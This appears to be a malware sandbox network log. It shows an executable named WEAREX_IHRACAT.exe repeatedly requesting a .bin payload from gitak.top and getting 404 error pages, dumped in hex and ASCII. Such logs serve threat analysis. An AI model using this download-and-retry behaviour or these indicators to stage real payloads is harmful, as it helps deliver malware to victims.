                        2024-08-29 10:43:06 UTC1369INData Raw: 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:43:06 UTC913INData Raw: 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e
                        Data Ascii: 3 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.
                        2024-08-29 10:43:06 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.11.2049793172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:43:16 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:17 UTC682INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:17 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 179
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbk%2FKlA5H5JLhG8PPhB65XbwQbdmh%2BQuyX7czVbll9LXT2Gn6wLrXAg2J01sP%2BrLITcKC2G80RJdaTG2N3GJ00IoPwRLkpY2uN0YM7%2Bs37rw0vlUL%2BiDrvlu77o%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf0706a5c05ce-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:43:17 UTC687INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:43:17 UTC1369INData Raw: 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49
                        Data Ascii: 0px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeI
                        2024-08-29 10:43:17 UTC917INData Raw: 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35
                        Data Ascii: 2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h5
                        2024-08-29 10:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.11.2049794172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:43:27 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:28 UTC674INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:27 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: EXPIRED
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Od4qaBQE%2FtUECG2uHXncFSGFpGy%2BElvcGv%2F4Zuev9uqQg3CYtB0J5RH5UGOt1uAq3oNKrZGFbXkZC5ZN8paB1%2F2pdPTk02kUIZNS3jKtbuNJRKQgd08JUWCvWLc%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf0b24fe40609-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:43:28 UTC695INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:43:28 UTC1369INData Raw: 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:43:28 UTC909INData Raw: 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20
                        Data Ascii: .415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627
                        2024-08-29 10:43:28 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.11.2049795172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:43:38 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:38 UTC683INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 11
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woX15csC0YOdsa1t8EAgxqkSaWKCCfkIOd%2Bw7Tlq0AZCVdXVwSZi9akJ%2FX4%2Fz%2FDXfb2Z8hEgZN1RbvaspsX9mjx7%2B5K8T45kDCrg9oMv%2BNEBzj31wMu03OoMeCU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf0f58f11c97c-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:43:38 UTC686INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:43:38 UTC1369INData Raw: 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65
                        Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fade
                        2024-08-29 10:43:38 UTC918INData Raw: 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68
                        Data Ascii: -2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h
                        2024-08-29 10:43:38 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.11.2049796172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:43:48 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:49 UTC675INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:48 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 21
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jLzCJsXLh%2FbWWp8BjVWVvbN3PyjdVuDU6cM5nc8f7Z%2Bx3yGVBy1YNlbzREWZFtOZoFTWPylOsvMeUFnOmg90cQlbqRlz5twBb0gZcQF0EnzDJeFM8C7NTFqGUo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf1371bc759ce-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:43:49 UTC694INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:43:49 UTC1369INData Raw: 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:43:49 UTC910INData Raw: 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37
                        Data Ascii: 2.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627
                        2024-08-29 10:43:49 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.11.2049797172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:43:59 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:59 UTC679INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:59 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 32
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66FqERb112nzweANwbLdsasmMz7%2FDYqGhx8TV%2BInDLuRcE3Xe9%2Fo0CcLb1X7S4Ag3zmA6d8YHlL7KsnZVtsScPJoowdkcYp3L01kOBtHiO2kCiw%2Bl5qVENt0YzA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf17898bac9bc-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:43:59 UTC690INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
